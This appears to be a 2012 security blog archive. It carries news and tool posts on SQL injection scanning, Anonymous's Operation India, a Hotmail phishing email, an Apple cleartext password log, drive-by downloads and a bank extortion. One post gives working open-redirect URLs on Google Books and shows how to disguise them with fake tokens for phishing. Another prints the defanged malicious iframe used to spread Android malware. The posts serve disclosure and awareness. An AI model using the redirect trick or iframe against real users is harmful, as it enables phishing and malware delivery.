Saturday, May 19, 2012

SQLSentinel v.0.1 released





SQLSentinel is an opensource SQL injection testing tool. This is an automatic tool which helps in finding SQL injection in web applications.






This tool includes a web spider and a sql error finder. It takes the URL of the website and then crawls the website to find the vulnerable parameter for SQL injection error. After it has done with job, it will generate the pdf report which contains the URL found vulnerable.


Download
Thursday, May 17, 2012

Anonymous turns to India, Announced Operation India



Anonymous group has been involved in many hacking activities. So far we've seen Operation Tunisia, Operation Zimbabwe, Operation Egypt and Operation Iran by this hacking group. Now, Anonymous has turned its attention to the subcontinent in Operation India. Infamous hacker group has nowannounced Operation India. They has also pulled down website of Indian Congress and Indian Supreme Court. Hacker group has also announced this operation via Twitter and YouTube account.


Main reasoon for this operation is the recent censorshiporder by Indian Court. Many Indian ISPs have blocked popular video sites like Vimeo, torrent website like thepiratebay and file-sharing sites after the court order.


I have also found a press release in which they have written the reason for this operation.


“Message to Noble Citizen of INDIA (Operation India)
“Over fifty years ago, Indian Freedom Fighters laid down their lives for our freedom. In the end, what was it all for? Today our politicians ride slip-shod over our laws, corruption is rampant. If the brutal way Baba Ramdev’s hunger strike was crushed is anything to go by, it would seem that India is now on its way to becoming an undemocratic ‘democracy’.
“Finally, steps were taken to correct this. The Lokpal Bill was created. And what happens? False tapes turn out to discredit those who support this bill, supporters of Baba Ramdev are mercilessly and brutally attacked.
“This needs to stop. The Anons of India and of the world are taking a stand against your lies and against your corruption. We have a agenda:
“# The Complete Removal of Corruption in all its forms, starting from the heighest order.
# Ensure Support to Baba Ramdev and Anna Hazare and other Civil minded individuals who have supported the Jan Lokpal Bill.
# Replace all Currency of Rs. 500 & Rs. 1000 with some new Number, so that Black Money will become just piece of papers.
# Aplogise to the people who got affected by the barbaric crackdown.
# Some kind of basic qualification to get elected as MP / MLA or member of any governing body.
# Unique ID no ( Like Citizenship ) for everything . All data must get store under Single ID.
# An investigation into offshore accounts held by Indian Politicians and the Corporates.
# Severe punishment for all the Corrupt officials.
# The clearance of pending court cases in all courts of India swiftly, and fairly.
“Until these demand are met and solutions implemented our attacks will not stop.
You, the government, were elected to listen to the voices of your people. To give them what they ask for. Too long have you ignored the voice of the “common man” which you claim to represent. Anonymous and the people of India are speaking now.”
Wednesday, May 16, 2012

Google Books open redirection Vulnerability



Recently i noticed a vulnerability in Google Books which has been merged into Google Play. It has a open redirection vulnerability in http://books.google.com/


I have also reported it to Google security team and got positive reply. But this vulnerability does not fall into Google's reward program and vulnerability still exists on the website.


What is Open Rediection Vulnerability?


If a website have unvalidate redirction then it is called Open redirection vulnerability. Open redirects and forwards is the vulnerability when an attacker uses popular websites URL to redirect the victim to a malicious website. 
This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. 


http://books.google.com/search?btnI&q=http://www.anydomain.com


When any user will click on the above link, he will be redirected to the URL http://www.anydomain.com. Change this according to your redirection URL



http://books.google.com/search?btnI&q=http://www.gmail.com
http://books.google.com/search?btnI&q=http://www.blogger.com



Change this URL to any URL where you want to redirect visitors


Attacker can hide this URL into fake tokens and parameters as below


http://books.google.com/search?btnI&tok=nsvn34t8nv92 n92v5n 939kgdgfnbsjdfbsfsfsfsfsfsbfsbjfbsjfbs&q=http://www.anydomain.com&tic=238758cci4y7y7vvy3v7 rt73vt3v3vvsmdvbgjgjs


This vulnerability only redirect to a .com domain. When i tested with domain with extensions other than .com, it opens a search page for that domain. 


Although this vulnerability does not fall into high risk category, but it can be used for phishing or malware serving.

Hash Code Verifier, A tool to verify the File Integrity





Recenlty i saw a nice tool called Hash Code Verifier developed by BreakTheSecurity Team. This tool is design to create and analyze hashes of their files. This will help to check the integrity of the file on the server.


Now a days, hackers bind trojans with softwares and upload it oon the interent. So most of the download websites also often publish MD5 or SHA hash of the file so that users can ensue that a file has not been modified by checking the file's hash value .






Features:

  1. Verify the Hash of a file
  2. Calculate hash for multiple files
  3. Compare Two files
  4. Simply Drag and drop files from computer into the application for generating hash.
  5. Supports MD5,SHA1,SHA256,SHA512 and CRC32 hash codes.
  6. Save the generated hash list in a text/HTML format
  7. Automatically generate hash when you browse or drop the files.
  8. Yes, it is Cross-platform(You can use this application in any Operating system)
Download Here:

Monday, May 14, 2012

"Your Account Has Been Blocked," New Hotmail Phishing



Hotmail users are advised not to open any kind of account alert email. A new phishing attack is trying to steal login details of hotmail users. Users are getting email entitled “E-mail account alert!” which warned users  that their accounts have been blocked. It also contain a link to verify and unblock account. Clicking on the link takes users to a website which asks users to enter their login details.


The message in email reads:
This e-mail has been sent to you by Hotmail to inform you that your account has been blocked.
Why are you seeing this? Someone may have used your account to send out a lot of junk messages (or something else that violates the Windows Live Terms of Service). We're here to help you get your account back. What do you need to do?
We'll ask you to login to our secured activation page by following the link below and re-activate your account.
[Link to phishing website]
If you have already confirmed your account information then please disregard this message.


Users who falls in the scam and click on the link are taken to a fake web page with login form of Windows Live login. If user enters login id and password, he will be taken to the legitimate website.


This is not a new scam for hotmail users. We have already seen many phishing scam for gmail, Facebook, windows Live and hotmail. users only need to see the link before giving login details.
Saturday, May 12, 2012

Orion Browser Dumper v1.0 released





Jean-Pierre LESUEUR (DarkCoderSc) releases another Browser Forensic tool for Community called "Orion Browser Dumper v1.0". 


This software is an advanced local browser history extractor (dumper), in less than few seconds (like for Browser Forensic Tool) it will extract the whole history content of most famous web browser, Actually Internet Explorer, Mozilla FireFox, Google Chrome, COMODO Dragon, Rockmelt and Opera.



The software also give you the possibility to edit the default keywords and of course add / modify your own keywords, to separate keywords subject you can create your own keywords categories and only scan for some keywords in the chosen category .


The program is fully asynchronous so it won't affect your work during the scan time nor it will block the customization of keywords and keylist and can be canceled at anytime.
Notice that this software will in any case alter the data, it will just open in read only and in background all history even if archived.



Download and Read More
Monday, May 7, 2012

Apple Latest Update exposes passwords in clear text



Apple has just released the new Lion security update, Mac OS X 10.7.3, which accidentally exposes passwords in clear text. This update puts a debug log file outside of the encrypted area that stores the user’s password in clear text. This log file contains password of all the users who have logged in since the update was applied. 


This flaw was found by a security researcher David Emery, who published his findings to the Cryptome. He also reported that this log file can also be accessed by booting the machine into firewire disk mode and reading it by opening the drive as a disk or by booting the new-with-LION recovery partition and using the available superuser shell to mount the main file system partition and read the file.


This log file is accessible outside of the encrypted area, so anyone having root access can access the file and grab the username and password of other users. So they can now access everything which is secured with these user credentials.


One can partially protect oneself against the firewire disk and recovery partition attacks by using Filevault 2 (whole disk encryption) which then requires one know at least one user login password before one can access files on the main partition of the disk.


But user who still use Filevault is vulnerable and cal lost their encrypted data because password is left unencrypted. If your hard drive is stolen, it doesn’t matter that the backups require a key to read. The backed-up log file contains the required password stored in clear text. 
Sunday, May 6, 2012

What is Drive by Download Malware?



There are many posts in my blog when I have posted some malware which use Drive by Download method to infect various system on the internet. But the method Drive by Download seems confusing for many people. This is a requested post which i am writing for those who have sent me mail regarding this post.

Drive by Download is a method which some malware use to infect and spread. This is not a malware type. On internet we visit many websites daily but some website. But some websites trick users to download malicious software which claims to be something else. Sometimes website uses pop-ups to spread this type of infection. Suppose pop-up has a simple message and two buttons saying yes and no. Clicking on any of 2 buttons start downloading some kind of code into your system. These infected pages use some kind of iFrame code to bypass antivirus detection.

Drive-by downloads continue to be a major security issue online. Most of the malwares and spyware use this trick to spread and infecting computers on the internet. Now Google is also taking this issue seriously and warns users if they try to visit any this kind of website from Google.
According to security company Sophos, more than 10,000 infected pages come out daily which spreads different kind of malware with this method.

Many of these infections are connected to botnets, in which each PC is turned into a zombie that may then be directed to further malicious activity, like spam or DDoS attacks.

Drive by install is a similar kind of attack in which website trick users to install some kind of tools into the system. You have seen some tool bars which appears in your browser which you never installed. These are the perfect example of Drive by download. These tool bars are some kind of adwares which changes your homepage and continue opening pop-ups in your computer.

How to avoid drive-by downloads
To minimize the risk of drive-by downloads, you should keep your web browser and your internet security software updated at all times. Also install all Windows patches as soon as they are released and don’t click on links in unsolicited or otherwise dubious e-mails.

New Drive By Download Malware Notcom Infecting Android Devices




A new Android malware, Notcom (NotCompatible) has been discovered which is infecting Android users by Drive By Download on visiting some malicious websites. These malicious website contain a malicious iframe that looks the USER AGENT string on each visitors request.
The iframe code is this:
<iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>



If it found an Android visitor, it redirects to the device to download a malicious Android package (APK).


This malware do not install automatically and expect users to download and install. It also tries to disguising itself as a security update.


For infection of this malware your device must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.


According to Lookout Mobile Security analysis report"
"NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices."


Unlike many other Android Trojans this trojan only requests network permissions to access interent, but itsintention doesn't appear to be collecting all of your contact details, SMSs, email and other personal details.


All android users are advised not to download any kind of Android app from any unknown source. Always from Google Play store or from trusted vendor. Only use trusted security updates. Never run after free security updates which can be a malware.

Download Browser Forensic Tool v2.0


Browser Forensic Tool v2.0 is an advanced local browser history search engine. This tool will search extract the URLs for chosen keywords from all the famous web browser, actually Internet Explorer, Google Chrome, Mozilla FireFox, RockMelt, Comodo Dragon and Opera.





The program will try to find the URLs in the history title and search for the searched keyword(s). If the keyword is found in title and search URL, it will be display in the search result list with his URL and Title.

The software also give you the possibility to edit the default keywords and of course add / modify your own keywords, to separate keywords subject you can create your own keywords categories and only scan for some keywords in the chosen category.

The program is fully asynchronous so it won't affect your work during the scan time nor it will block the customization of keywords and keylist and can be canceled at anytime.

Notice that this software will in any case alter the data, it will just open in read only and in background all history even if archived.

Download Now


Read More



Friday, May 4, 2012

Hackers Blackmail Dexia Bank, demanded $196,000 for not to leak data



A group of hackers have released a statement in which they clamied to broken into servers pf Elantis, a Belgian credit provider owned by Dexia. They also demaded that the bank pay 150,000 EUR ($196,000) before May 4 of they will leak all the customers data.

"In addition to database tables containing data such as internal login credentials, we downloaded numerous tables which contain Internet loan applications, as well as fully-processed applications. Those tables hold highly-sensitive data such as the applicants' full names, their jobs, ID card numbers, contact information and details about their income," Hackers posted online.

Hackers also claim that they are not blackmailing anyone. They are just demanding an "idiot tax" from bank for leaving secure data unprotected on the company server. 

"It is worth pointing out that this data was left unprotected and unencrypted on Elantis' servers," hacker says the statement, adding: "While this could be called 'blackmail,' we prefer to think of it as an 'idiot tax' for leaving confidential data unprotected on a Web server."

“The only question that remains now is this -- After they carelessly treated their clients' data, will Dexia act to prevent their clients' data from being published online, or is their clients' confidentiality worth less to them than EUR 150,000?” they added.

They have also posted a small part of obtained data to prove that their claim is not just a statement. Hacker also claimed that Elantis took down its public-facing website after the breach which is also correct and website is still offline.

Bank also confirms data breach and said that they are investigating the incident. The bank has told the press that they are not prepared to pay. That they don't like blackmail.

Insecure Cryptographic Storage Vulnerability on Web Applications



This vulnerability exists on web applications due the lack of knowledge of developers. Most of the organizations uses web application to manage all tasks of the organization. Every company is now putting its confidential document online. But sometimes these applications, designed to access and manage data, fail to protect data. It results in data leakage.


Most common problem with the web application is that developers do not care about the security of data. Most of the time, passwords are stored in plain text form or encrypted with some poor encryption. This is not safe. It can lead to data exposure in case of database leakage. 


Developers must try to protect data as much as they can. These flaws can lead to information disclosure of sensitive data and information, which may harm an organization. If this vulnerability exists in an e-commerce website, it may harm users of the website more than the company running the website.



Read the full article written by me on Infosec Institute page. 

Insecure Cryptographic Storage on Web Applications

Interested in learning Web Application Penetration Testing, we recommend the best course

 "Web Application Penetration Testing"